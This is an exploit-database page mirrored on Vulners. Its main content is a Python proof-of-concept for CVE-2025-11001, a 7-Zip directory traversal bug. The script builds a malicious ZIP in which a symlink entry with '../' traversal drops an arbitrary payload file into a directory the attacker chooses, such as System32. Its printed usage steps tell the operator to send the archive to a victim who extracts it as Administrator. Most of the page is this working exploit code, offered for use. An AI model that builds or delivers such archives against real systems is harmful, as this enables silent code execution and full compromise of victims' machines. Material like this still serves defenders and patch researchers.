Vulners
Lucene search
7-Zip 24.00 - Directory Traversal
🗓️ 08 Apr 2026 00:00:00Reported by Mohammed Idrees BanyamerType 
exploitdb🔗 www.exploit-db.com👁 65 Views
| Reporter | Title | Published | Views | Family All 55 |
|---|---|---|---|---|
 | Exploit for CVE-2025-11001 | 20 Nov 202504:16 | – | githubexploit |
| Exploit for CVE-2025-11001 | 22 Nov 202517:58 | – | githubexploit |
| Exploit for CVE-2025-11001 | 24 Nov 202513:55 | – | githubexploit |
| Exploit for CVE-2025-11001 | 14 Oct 202509:25 | – | githubexploit |
| Exploit for Path Traversal in 7-Zip | 12 Dec 202516:49 | – | githubexploit |
| Exploit for CVE-2025-11001 | 15 Oct 202512:14 | – | githubexploit |
| Exploit for CVE-2025-11001 | 22 Nov 202510:13 | – | githubexploit |
 | 7-Zip < 25.00 | 23 Jul 202500:00 | – | nessus |
| Amazon Linux 2023 : p7zip, p7zip-plugins (ALAS2023-2025-1250) | 28 Oct 202500:00 | – | nessus |
| Amazon Linux 2023 : 7zip, 7zip-reduced, 7zip-standalone (ALAS2023-2025-1251) | 28 Oct 202500:00 | – | nessus |
10
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions
import struct
import os
import argparse
import sys
def build_zip(target_path, payload_file, output_zip):
if not os.path.isfile(payload_file):
print(f"[-] Payload file not found: {payload_file}")
sys.exit(1)
payload_name = os.path.basename(payload_file)
payload_data = open(payload_file, "rb").read()
target = target_path.replace("\\", "/").strip("/") + "/"
traversal = "../../../../" + target
with open(output_zip, "wb") as f:
offset = 0
symlink_name = "evil.lnk"
symlink_target = traversal.encode() + b"\x00"
symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
symlink_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra))
f.write(symlink_header)
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(b"")
symlink_central_offset = offset
offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
payload_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0)
f.write(payload_header)
f.write(payload_name.encode())
f.write(payload_data)
payload_central_offset = offset
offset += len(payload_header) + len(payload_name) + len(payload_data)
cd_offset = offset
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
f.write(payload_name.encode())
f.write(struct.pack("<IHHHHIIH",
0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
print(f"[+] Malicious archive created: {output_zip}")
print(f"[+] Target path : {target_path}")
print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
print(f"[+] Final write location : {target_path}\\{payload_name}")
print("\n[*] Usage:")
print(" 1. Send the ZIP file to the victim")
print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
print(" 4. Achievement unlocked")
if __name__ == "__main__":
banner = """
CVE-2025-11001 - 7-Zip Directory Traversal PoC
Author: Mohammed Idrees Banyamer (@banyamer_security)
"""
print(banner)
parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
args = parser.parse_args()
build_zip(args.target, args.payload, args.output)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2026 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.8
CVSS 37
EPSS0.00258
SSVC